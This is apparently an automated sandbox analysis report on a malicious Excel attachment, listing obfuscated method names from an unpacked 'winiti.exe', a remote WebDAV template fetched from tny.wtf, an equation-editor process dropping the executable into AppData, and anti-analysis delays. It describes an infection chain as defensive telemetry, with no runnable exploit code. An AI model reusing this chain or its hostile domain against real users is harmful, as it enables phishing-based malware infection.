                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'

                Persistence and Installation Behavior

                barindex
                Microsoft Office launches external ms-search protocol handler (WebDAV)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
                AI detected suspicious Excel or Word document
                Source: Office documentLLM: Score: 8 Reasons: The screenshot contains a visually prominent image with the Microsoft Office logo and the text 'This document is protected'. This can mislead users into clicking on a potentially harmful link. The text creates a sense of urgency or interest by implying that the document is protected and needs to be accessed through a specific action. The impersonation of the well-known Microsoft Office brand adds to the credibility of the phishing attempt. The sense of urgency is directly connected to the prominent image, which likely serves as a link or button to a phishing page or malware download.
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: B9D5C678.doc.3.drJump to dropped file
                Office viewer loads remote template
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: RFQ#51281AOLAI.xlsStream path 'MBD001BDE15/Package' entropy: 7.97230907292 (max. 8.0)
                Source: RFQ#51281AOLAI.xlsStream path 'Workbook' entropy: 7.99941847659 (max. 8.0)
                Source: 45930000.0.drStream path 'MBD001BDE15/Package' entropy: 7.96744779352 (max. 8.0)
                Source: 45930000.0.drStream path 'Workbook' entropy: 7.99934525895 (max. 8.0)
                Source: ~DFA1D41AEDA01093E0.TMP.0.drStream path 'Package' entropy: 7.96744779352 (max. 8.0)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 22D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 640000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5920000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 6A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 7A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009A0101 rdtsc 9_2_009A0101
                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3336Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3456Thread sleep time: -30000s >= -30000sJump to behavior
